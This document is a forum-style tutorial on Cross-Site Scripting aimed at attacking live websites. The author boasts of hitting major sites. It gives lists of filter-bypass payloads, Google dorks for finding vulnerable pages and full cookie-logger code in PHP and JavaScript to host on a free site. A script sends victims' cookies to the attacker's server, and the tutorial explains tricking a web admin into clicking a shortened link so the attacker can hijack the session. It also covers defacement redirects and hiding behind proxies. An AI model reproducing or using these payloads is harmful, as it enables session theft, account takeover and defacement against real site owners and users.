Full Ultimate Cross-Site Scripting (XSS) Tutorial
Tutorial provided by
Hello and thanks for reading this tutorial on XSS, written
by me. You may be asking as to why I'm creating this tutorial. My inbox has
lately been flooding, and I've recieved a lot of requests on making this
tutorial. I've posted my XSS attacks on Google, Facebook, Defense.gov, and
other huge sites. I've even exploited HackForums' security with XSS.
What is XSS?
XSS stands for Cross-Site-Scripting. It is basically an
attack, that is used to execute HTML and Javascript on the web-page. This
attack can be done by submitting queries into text-boxes, or even into the URL.
The results come back reading the text as HTML, so it executes the scripts
instead of displaying them in plain text. With an XSS attack, you can steal
cookies from a Web-Administrator, or even use some social-engineering to
manipulate someone into download a virus that you've created. Such as a Botnet,
or RAT, maybe even a Keylogger. XSS can be very dangerous, but can also be very
mild. Most of my attacks are mild XSS attacks, that can be difficult to use
against a website. There are many ways to use XSS to your advantage. I will
name a few examples. You can use an alert box to advertise yourself, or alert
the web-admin that you've discovered a security breach involving XSS. You can
also setup a Cookie-Stealer/Logger. Anything you can do with HTML, can be used
against a site with this attack. I will explain some of the most important
terms associated with XSS.
What is HTML and Javascript?
HTML
HTML is sort of like a programming language. The
distinctions between a programming language, and HTML, are not too far apart.
They are both languages, that are used to create attributes, and events. HTML
is a markup language, which is used mostly to create websites. HTML stands for
Hyper-Text Markup Language. You can use HTML to create forms, buttons, and
other stuff that can be used in a webpage. I highly doubt you will ever
encounter a website that does not contain even a slight amount of HTML.
Javascript
Now, first, let's get one thing straight. There is a HUGE
difference between JAVA and JAVASCRIPT. Java, is a language that ressembles to
C++, it can be used in games, and applications. Javascript is sort of similar
to HTML, but definitely different in many ways. Javascript isn't used NEARLY as
much in Webpages than HTML is. Javascript is used, more in applications outside
of webpages. Like PDFs. Javascript can be an incredibly useful language along
with HTML. They are both fairly simple to learn, and are very dynamic.
XSS: My first attack.
Now, let's start getting into the really good stuff. In this section, I'll be
explaining how to use XSS to your advantage. We will also be launching our very
first attack with XSS, if you know the basics to XSS, you can skip this
section, because I doubt you will learn anything that you don't briefly know
yet.
Now, our first step, is obviously to find a vulnerable site. Finding a site
vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The
problem is, it can take time to determine whether the site is really
vulnerable. With SQLi, you can just add a little '. But in XSS, you must submit
(sometimes) multiple queries, to test your site for XSS.
Most vulnerable sites will contain a Search, Login, or a Register area. Pretty
much anywhere that contains a text-box, can be exploited with XSS. HOWEVER,
many people forget this fact, and never use it to their full potential because
they think it's useless. You can exploit XSS through the source aswell. You
can't just take any script, and edit the full thing. But editing an
"onmouseover" script, is definitely an exception. I will be
explaining this method of XSS later on, for now, we need the complete basics.
Anyways, our site should have some Text-Boxes to input some HTML in. I will
simply be using a search bar.
So, lets try putting in the most known, BASIC query of all time.
Code:
<script>alert("XSS")</script>
That little script, is HTML. It will make a little message pop up, saying
"XSS". You can edit that part if you like. Just don't edit any other
parts of the script. Put that into your search bar, and hit enter. Now, if a
little alert box popped up, you've successfully attacked a site vulnerable to
XSS! If no box popped up, that is alright, because that means the site has
taken some time to put in a filter. A filter, is when we search something, then
it goes through a mini process, basically an inspection. It checks for any
malicious (dangerous) things. In this case, it will look for XSS. Sometimes,
these filters are very weak, and can be by-passed very easily, other times,
they can be quite difficult to bypass. There are a lot of ways to bypass an XSS
filter. First, we have to find out what the filter is blocking. A lot of the
time, it is blockin the alert. Here's an example of this kind of filter:
Code:
<script>alert("XSS")</script>
Code:
<script>alert( > XSS DETECTED < )</script>
It will block the quotes. So how the hell do we get passed that? Well,
thankfully there's a way to encrypt the full message :). We will be using a
little function called "String.FromCharCode". The name of it pretty
much explains it all. It encrypts our text, into ASCII. An example of this
encryption, would be like this:
Code:
String.fromCharCode(88,83,83)
Yes, it can be a little bit confusing, but with a little bit of explaining, and
testing, it is quite simple. Here is what our full query will look like:
Code:
<script>alert(String.fromCharCode(88,83,83))</script>
You do NOT need ANY quotes in the simple query like that. So lets put that back
in the search bar, and voila! It worked! We got an alert box saying
"XSS"! If you still didn't get any alert box, try some of these
queries that I like to use:
Code:
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))
Yes, I just wrote all those down, and it took longer than it should've, but
they all work in their own way, so try as many of them as you can. I've
attacked some pretty huge sites with some of those queries. I create my own
queries sometimes, you should create some too, they can come in handy a lot.
XSS: Advanced Methods
Now, in this section I will be sharing some ways to use XSS
maliciously against a site. Now, keep in mind all malicious attacks sent over
to a system, site, or server, is illegal and you CAN be prosecuted for these
actions. So ALWAYS use protection if you're planning on doing something
malicious to the site. If you want to make a little alert box pop up, you
shouldn't need a Proxy/VPN.
Cookie Stealing/Logging
Now, cookie stealing is about the most malicious thing we
can do with Non-Persistent XSS. A cookie stealer/logger, will log the cookies
of the user who access the page to a certain document. The easiest way to do
this, would be with a three step process.
First, you should setup a site. Personally, I find
http://www.000webhost.com/ the
best for upload malicious code, programs, or anything else. So go ahead and
register there.
Now, once you've created your site, go to the file manager. Create a new file.
Call it "CookieLog.txt". Leave the code blank. Now, create another
file after that, called "CookieLogger.php". In CookieLogger.php, we
need to add some code, so that it sends the cookies that we log, into our
Cookie Log. Add this code, into it (Just make sure the file name has .php, or
else it will not run the PHP code (Which is an enormous problem)).
Code:
<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
if(strlen($_SERVER['QUERY_STRING']) > 0) {
$fp=fopen('./CookieLog.txt', 'a');
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
fclose($fp);
} else {
?>
var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';
// ==
// URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
// web site you include a credit somewhere on the web site
// with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
// The Javascript escape and unescape functions do not correspond
// with what browsers actually do...
var SAFECHARS = "0123456789" + // Numeric
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
"abcdefghijklmnopqrstuvwxyz" +
"-_.!~*'()"; // RFC2396 Mark characters
var HEX = "0123456789ABCDEF";
var plaintext = str;
var encoded = "";
for (var i = 0; i < plaintext.length; i++ ) {
var ch = plaintext.charAt(i);
if (ch == " ") {
encoded += "+"; // x-www-urlencoded, rather than %20
} else if (SAFECHARS.indexOf(ch) != -1) {
encoded += ch;
} else {
var charCode = ch.charCodeAt(0);
if (charCode > 255) {
alert( "Unicode Character '"
+ ch
+ "' cannot be encoded using standard URL encoding.\n" +
"(URL encoding only supports 8-bit characters.)\n" +
"A space (+) will be substituted." );
encoded += "+";
} else {
encoded += "%";
encoded += HEX.charAt((charCode >> 4) & 0xF);
encoded += HEX.charAt(charCode & 0xF);
}
}
} // for
return encoded;
};
cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);
< ?php
}
?>
Now that we have our Cookie Logger script, we can send the cookie logger to our
best friend, the Web-Admin :). To do this, we should probably Tiny the URL. Or
if you can figure out how to Spoof the URL, that will work too.
To Tiny the URL, go to
http://www.spam.com/ and
just put in the URL. But hold one, we need to add a script into our XSS
vulnerability. This is the script that will start our Cookie Logging.
Code:
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
So just add that script after the URL, then tiny it, and send it to our
Web-Admin, now this can take some time for the Admin to actually click it.
Sometimes, the Admin won't click it, so if it takes too long, you should just
give up and find another way to exploit it.
Once you get the cookie, you can use "Cookie Manager" Firefox addon
to manipulate and edit the cookies so that you can hijack the administrators
session. I find Cookie Manager a very useful app for XSS, make sure to download
it.
Defacing
Defacing is one of the most common things people like to do
when they have access to multiple administrator options. Mostly so that they
can advertise themselves, and simply let the administrator know that their
security has been breached. Anyways, defacing with XSS requires persistent XSS,
maybe a comment box, or something. You can use this script to create a
re-direct to your deface page (You should probably redirect it to your deface
on Pastehtml.com, because it's anonymous uploading.)
Code:
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
XSS: Javascript Events
Onmousover isn't a very exploitable vulnerability. But yet,
it is still considered XSS. An onmouseover vulnerability would look something
like this:
Code:
onmouseover=prompt1337
We can exploit this, by editing it to:
Code:
onmouseover=alert("XSS")
Very basic vulnerability, but it's getting more noticed, and patched in a lot
more websites. Most sites will use Adobe Flash or CSS to do those kind of
effects now.
XSS Filter Bypassing Techniques
Sometimes a simple XSS query just won't do the trick. The
reason your query isn't working, is because the website has a WAF or Filter set
in place. A filter will block as many XSS and SQLi queries as possible. In this
case, we're dealing with XSS.
There are many ways on bypassing XSS filters, but I will only explain a few.
Hex Bypassing
With blocked characters like >, <, and /, it is quite
difficult to execute an XSS query. Not to worry, there's always a solution :)
You can change your characters, into Hex. A Hex of a certain character, is
basically the character, but in a different format. These should help you out:
> = %3e
< = %3c
/ = %2f
ASCII Bypassing
With an ASCII encryption, we can use the character ".
Which is blocked quite a bit. This is one of the most common XSS Filter
bypasses of all time. A script that you would need to encrypt, would look like
this:
NOT WORKING SCRIPT
Code:
<script>alert("XSS")</script>
WORKING SCRIPT
Code:
<script>alert(String.fromCharCode(88,83,83))</script>
Case-Sensitive Bypassing
This kind of bypass rarely works, but it's always worth a
shot. Some filters are set in place to detect certain strings, however, the
filter's strings that are blocked are CASE SENSITIVE. So all we need to do, is
execute a script, with different sizes of characters. This bypass, would look
like this:
Code:
<ScRiPt>aLeRt("XSS")</ScRiPt>
You can also mix that with ASCII encryption if you like. This kind of bypass
only works on really stupid filters, or really REALLY old ones.
Some XSS Dorks
It's usually best to create/find your own dorks, but in this
tutorial, I'll write some up real quick to share:
Code:
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
Those dorks are about as basic as they can get, sorry if they do not satisfy
you. I rarely use dorks, and with this tutorial you shouldn't need to use dorks
to find a vulnerable site. XSS is a very popular vulnerability. Even in google
I found some. Some in HackForums too. XSS isn't a very high-priority, at least
not Non-Persistent.